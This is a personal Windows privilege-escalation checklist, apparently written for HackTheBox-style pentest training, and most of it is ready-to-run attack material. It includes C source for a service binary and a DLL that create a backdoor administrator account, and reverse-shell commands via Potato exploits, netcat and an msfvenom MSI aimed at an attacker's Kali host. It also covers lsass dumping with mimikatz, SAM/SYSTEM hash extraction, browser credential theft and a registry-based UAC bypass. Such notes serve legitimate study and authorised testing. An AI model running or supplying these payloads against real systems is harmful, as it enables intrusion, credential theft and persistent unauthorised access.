Windows Privilege Escalation

HTB Windows Privesc Checklist

Enumerating Windows

Windows Privilege and Access Control

Secure Identifier (SID)
- Value assigned to each entity
- Generated by Local Security Authority for local users and on the DC for domain users
- SID looks like this: S-R-X-Y
  - S indicates an SID
  - R is for revision and is always 1
  - X determines the identity authority (who gave authority) - 5 is NT Authority
  - Y is a bunch of number strings indicating the sub authorities of the entity
    - Example: S-1-5-21-1336799502-1441772794-948155058-1001
      - RID is 1001, indicating second local user created
  - S-1-0-0 = Nobody, S-1-1-0 = Everybody, S-1-5-11 = Authenticated Users, S-1-5-18 = Local system, S-1-5-{domainidentifier}-500 = Administrator
Once a user authenticates, they are granted an access token containing the security context
Security context
- Contains the SID, SIDs of the user’s groups, user and group privileges, and scope info
Integrity Control
- There are four integrity levels
  - System: SYSTEM (kernel)
  - High: Elevated users
  - Medium: Standard users
  - Low: very restricted rights
User Account Control (UAC)
- Windows runs most applications with user privileges (even as Administrator)
- Running programs as Administrator requires a UAC prompt

Collecting Environment Data

Generally try to collect:
- Username/hostname - whoami
- Group memberships of user - Get-LocalGroup
- Existing users/groups - Get-LocalGroupMember {group name}
- OS version and arch - systeminfo
- Network Information - ipconfig /all, route print, netstat -ano or -q
- Installed Applications - Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node{can_be_removed}\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname - displays all removable applications
  - Can remove select displayname to return all info, like file path
- Running Processes - Get-Process
  - Get-Process | Select ProcessName,Path
- Environment Variables!!
  - Get-ChildItem Env:

Collecting Sensitive Information or Credentials

Seems a very common method of privilege escalation would be checking installed programs for configuration passwords
- This is pretty much as simple as looking in C:\, C:\Program Files\, and C:\Program Files (x86)\ for unusual applications
For automatic enumeration, use LaZagne (see below section)

Searching for Sensitive Information

Check common folders for passwords - it’s pretty common (can use functions below)
- Check hidden directories/files with {dir/ls} -force
Example: search directories for config files:
- Get-ChildItem -Path C:\Users -Include *.txt, *.ini, -File -Recurse -ErrorAction SilentlyContinue -force - For sensitive files in general, try .kdbx, .ssh, .rdp, etc.
Search contents of files
- findstr /sim {password/pass/pwd/cred/vnc} *.{txt/ini/xml/config} (*.{txt/ini/xml/config})
Using sensitive information
- Runas - can run commands as a privileged user - this is basically sudo
  - runas /user:{username} {program, like powershell.exe}
StickyNotes
- People will often use sticky notes to store passwords, which can be retrieved at C:\Users\{user}\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite (along with plum.sqlite-shm and plum.sqlite-wal)
- Then, open these three files in a sqlite3 browser and select Text from Note
Other places to look for credentials:

%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*

Find sensitive PowerShell information

Looking for PowerShell Transcription and PowerShell Script Block Logging
- First basically logs every powershell command entered in plaintext, the second records commands and blocks of script code while executing
- This would be pretty fucking awesome at CCDC as a red teamer, lol
(Get-PSReadlineOption).HistorySavePath - ENTIRE PowerShell history
Event Viewer + Script Block Logging
- Go to Applications and Services Logs > Microsoft > Windows > PowerShell > Operational and scroll through logs
Evil-WinRM
- Basically a better shell that provides pass-the-hash, in-memory loading, file upload/download, etc. from kali
- Download a file with download {filename}
- Upload a file with upload {filename}
- evil-winrm -i {IP} -u {username} -p {password}
- Can also be provided keys
  - evil-winrm -i {IP} -c certificate.pem -k priv-key.pem -S

Browser Credentials

Can use SharpChrome to retrieve cookies/logins from Chrome
- .\SharpChrome.exe logins /unprotect
Firefox stores cookies in a SQLite database at %APPDATA%\Mozilla\Firefox\Profiles\{random_value}.default-release
- We can copy the database with copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .
- Then, use something like cookieextractor to extract the cookies from the DB

Remote Access Tool Credentials

Use SessionGopher to extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials
- Import-Module .\SessionGopher.ps1 and then run Invoke-SessionGopher -Thorough

DPAPI Keys

Master encryption keys used by the Data Protection API (DPAPI) to encrypt data like passwords/certs
Derived from logon passwords
We’ll find the master key in ~\AppData\Roaming\Microsoft\Protect\{user_SID}\, which we can decrypt using impacket:
- dpapi.py masterkey -file {masterkey_file} -sid {user_SID} -password '{user_password}'
We can then use the masterkey to decrypt credentials, which are commonly found in ~\Appdata\(Roaming/Local)\Microsoft\Credentials\ again using impacket:
- dpapi.py credential -file {credential_file} -key '0x{master_key}'

Automated Tools

Winpeas

Great general priv esc script
Available at https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASany_ofs.exe
winpeas.exe --fileanalysis to analyze files

LaZagne

Specializes in finding credentials in all kinds of areas (browsers, chat clients, email, memory dumps, internal storage)
https://github.com/AlessandroZ/LaZagne
Run with \lazagne.exe all

PowerUp Powershell Script

https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1

SharpUp ghostpack executable

https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe
Will check for misconfigured ACLs

Seatbelt

https://github.com/GhostPack/Seatbelt
Full enum: .\Seatbelt.exe -group=all

Sherlock

Check for missing patches on outdated versions of Windows
https://github.com/rasta-mouse/Sherlock
Import-Module .\Sherlock.ps1 and Find-AllVulns

Leveraging Windows Services

Hijacking Service Binaries

Get-CimInstanceto query services of WMI (Windows Management Instrumentation) class
- Get-CimInstance -ClassName win32_service | Select Name,State,Pathname | Where-Object {$_.State -like 'Running'}
- PowerUp.ps1 (https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) can also identify these (among others)
Check the permissions of the service binaries with icacls or Get-ACL
- icacls "{executable path}"
- F - Full access
- M - Modify Access
- RX - Read/execute access (this is too low)
- R - Read-only access
- W - Write only access
If a user has full control over a binary with higher permissions (like a MySQL daemon), we can edit the executable and it will be run with higher permissions
- This can occur due to full permissions being an easy solution for sysadmins
- This binary can be as simple as creating an administrative user with system()
- sudo apt install mingw-w64
- x86_64-w64-mingw32-gcc newuser.c -o newuser.exe
  - python3 -m http.server
  - iwr -uri http://{kali_IP}:8000/newuser.exe -Outfile newuser.exe

#include <stdlib.h>
int main ()
{
  int i;
  
  i = system ("net user kali Password123! /add");
  i = system ("net localgroup administrators kali /add");
  i = system ("net localgroup "Remote Desktop Users" kali /add");
  
  return 0;
}

Then, move the normal executable out from it’s usual location, move ours in, and then figure out how to restart the service (so it uses the exe)
Restarting the service
- Could be as simple as net stop {service}, but access will likely be denied
- If the service’s StartMode is set to “Auto”, we can reboot the system (if permissions allow)
  - shutdown /r /t 0

Hijacking Service DLLs

Similar to hijacking binaries, can replace DLL with malicious code
Searching for DLLs:
- Get-ItemProperty "HKLM:\SOFTWARE\(optional)Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname to find installed software
- The versions of this software could be vulnerable to DLL hijacking (search it up)
Can also replace missing DLLs with malicious ones
- This can be useful when we find a binary we can’t modify that loads a missing DLL
  - Will likely be looked for in a PATH location (check with $env:path), so we put it there
- We can find missing DLLs by copying user executables to our machine and checking them out with Process Monitor
When making the DLL, we can again simply add an administrative user to the system using something like the following inside of case DLL_PROCESS_ATTACH:
- int i; i = system("net user /ADD tempuser"); i = system("net localgroups administrators /ADD tempuser"); break;
- MinGW can compile C++ code into DLLs with the --shared flag
  - x86_64-w64-mingw32-gcc dll.cpp --shared -o dll.dll

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user kali kali123! /add");
  	    i = system ("net localgroup administrators kali /add");
  	    i = system ("net localgroup "Remote Desktop Users" kali /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

.bat files

Just call an executable inside the batch file: C:\Users\Public\reverseshell.exe

Abusing Service ACLs

If we have full control over a service, we can use sc to modify the service
Something like sc config {vulnerable_service} binpath="cmd /c net localgroup administrators {our_user} /add" will do the trick
- Alternatively, we could provide a path to a malicious executable

Abusing Unquoted Service Paths

This occurs when we can write to a service’s main directory without being able to modify the current files
Can again be found using wmic in cmd:
- wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
- These will list potentially vulnerable paths
Abusing this:
- Let’s say a service path is in use like C:\Program Files\Enterprise Agents\Company Files\GammaServ.exe
- Windows will first check for C:\Program.exe, then C:\Program Files\Enterprise.exe, then C:\Program Files\Enterprise Agents\Company.exe, and finally C:\Program Files\Enterprise Agents\Company Files\GammaServ.exe
  - If we can write to the C:\Program Files\Enterprise Agents\ directory, we can make an executable called Company.exe, which will be used before the real one
- Then, restart the service somehow and our executable should run

Abusing Other Windows Components

Living off of the Land

LOLBAS is a great resource similar to gtfobins
Microsoft signed files that have extra, unexpected functionality, such as, executing code, compiling code, file operations, persistence, UAC bypass, credential theft, dumping process memory, surveillance, log evasion, and DLL side-loading/hijacking
- For example, certutil can download files with certutil.exe -urlcache -split -f http://{kaliIP}/{file} {output_file}

Using Scheduled Tasks

Need to know who runs the scheduled tasks, what triggers are required, and what the tasks do
View scheduled tasks with Get-ScheduledTask or schtasks /query /fo LIST /v
- This is a shit ton of info, pipe it into a text file and search through it
  - Can search for {workgroup}\, which will return things authored by people like CLIENTWK220\daveadmin
- Check author of scheduled tasks, tasks to run, and next run time
  - Sometimes, privileged authors can put the executables in modifiable locations
  - Thus, if we replace it, it will be run as a privileged user on next run time
Get startup tasks: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Registry

WinPEAS will output controllable Registry entries, look for
- HKLM\system\currentcontrolset\services\<service> (Interactive [FullControl])
Autorun:
- reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
- reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Can check perms with accesschk \accepteula -uvwqk "{path}"
- https://download.sysinternals.com/files/AccessChk.zip
reg query {registry_path}
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v {file_path_entry} /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
AlwaysInstallElevated
- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- If one of these works, do
  - msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={port} --platform windows -f msi > reverse.msi
  - msiexec /quiet /qn /i reverse.msi

Abusing Privileges to Execute Code as Privileged Users

Can either exploit applications, the kernel, or abuse privileges we have
whoami /priv
- This will return the specific privileges our user has, in either an enabled or disabled state
- Disabled just means we need to enable it before using the relevant command
  - We can enable all privileges using this powershell script
Privilege Abuse:
- If we have SeImpersonatePrivilege, SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, SeTakeOwnershipPrivilege or SeDebugPrivilege, we can sometimes perform operations in the security context of another user
  - With the SeBackupPrivilege and SeRestorePrivilege, we can read arbitrary files with robocopy: robocopy /b C:\<path to file> .\<filename>
    - We can also just privesc via the following:
    - reg save hklm\sam C:\Users\{current_user}\sam
    - reg save hklm\system C:\Users\{current_user}\system
      - The SAM and SYSTEM will usually be located here:
        
        C:\Windows\repair\SAM
        
        C:\Windows\System32\config\RegBack\SAM
        
        C:\Windows\System32\config\SAM
        
        Can search with dir /s {SAM/SYSTEM}
    - impacket-secretsdump -sam sam -system system LOCAL
  - Use SharpUp to determine which privileges are abusable
  - With SeDebugPrivilege
    - procdump.exe -accepteula -ma lsass.exe lsass.dmp
    - Then, run mimikatz (run log so output is in txt) and run sekurlsa::minidump lsass.dmp
  - With SeTakeOwnershipPrivilege
    - Outlined here: https://academy.hackthebox.com/module/67/section/642
    - We can essentially take ownership of any file, folder, or registry key
    - Abused with takeown /f '{path_to_object}'
      - This gives us ownership, but we might still not have the proper ACLs, so we need to give them to ourself
      - icacls '{path_to_object}' /grant {our_user}:F
- Named pipes:
  - Allow unrelated processes to share data between each other
  - If we can coerce a a privileged process into connecting to a controlled named pipe, we can capture the authentication and use SeImpersonatePrivilege to impersonate the user account and perform operations in their security context
    - SweetPotato can be used to reliably exploit this it seems; use the nc reverse shell below
- General Potato information:
  - https://jlajara.gitlab.io/Potatoes_Windows_Privesc
- SweetPotato
  - Apparently just the best potato
  - https://github.com/CCob/SweetPotato
    - Compiled pretty painlessly after cloning the repo in Visual Studio 2022
  - .\SweetPotato.exe -e EfsRpc -p {path_to_nc.exe} -a "{kali_ip} {listening_port} -e cmd" works pretty well
- JuicyPotato
  - https://github.com/ohpe/juicy-potato/releases/tag/v0.1
  - C:\Users\Public\JuicyPotato.exe -l 1337 -p C:\Windows\system32\cmd.exe -a "/c {nc.exe_path} {kali_IP} {kali_port} -e cmd.exe" -t *
- GodPotato
  - Can use for a reverse shell GodPotato.exe -cmd "cmd /c reverse.exe"
    - GodPotato.exe -cmd "powershell -e ...."
  - Can also use it to create a new administrative user, then rdp/winrm in
- Sigma Potato (PrintSpoofer)
  - Coerces NT AUTHORITY/SYSTEM into a named pipe
  - Can be used when we have a user with SeImpersonatePrivilege
  - wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
  - .\PrintSpoofer64.exe -i -c powershell.exe

Bypassing UAC

If we’re a local administrator on a system, but get an Access is denied. error while a attempting to perform a privileged action, it’s likely UAC
Windows User Account Control can be bypassed using many different techniques
Check if it’s running with REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
- Check level with REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin (5 being the highest level)
The bypasses/escalations we can do depend on our Windows version number, which we can get with [environment]::OSVersion.Version
The UACME project maintains a list of bypasses per Windows version number
The Bypass UAC powershell script can automate this
- Import-Module .\Bypass-UAC.ps1 and then Bypass-UAC -Method UacMethodSysprep
This Blog goes into bypass techniques, of which fodhelper and elevated COM in cmsptlua are pretty reliable
Go-to bypass:
- reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f
  - If this gets detected, use a directory traversal payload
- reg add "HKCU\Software\Classes\Folder\shell\open\command" /v "DelegateExecute" /f
- Then trigger with %windir%\System32\sdclt.exe

Bypassing GPO restrictions

Often, GPO restrictions will be in place where users can’t access perform certain actions
- This could be accessing a certain share or folder from Explorer or running cmd/powershell
Thus, we can do something like open MS paint, open the file dialog box from there, and then type the fileshare in the filename field
- Something like \\127.0.0.1\c$\users\{user}
- This can also help us break out of restricted environments or kiosks, as we can host cmd.exe in a network share, access the share from paint’s explorer dialog, right click cmd.exe, and open it
  - Alternatively, we can edit an existing shortcut such that the Target field is C:\Windows\System32\cmd.exe, and thus opening the shortcut pops cmd
- .bat, .ps, and .vbs scripts will sometimes automatically execute, which can also be used to gain a shell
Can also try using Q-Dir or Explorer++ if GPO restrictions are on explorer itself (similar story with Simpleregedit or SmallRegistryEditor for registry restrictions)

Miscellaneous

WireShark

Wireshark isn’t limited to Administrators by default, so if we can run it, we can capture creds sent over the wirexx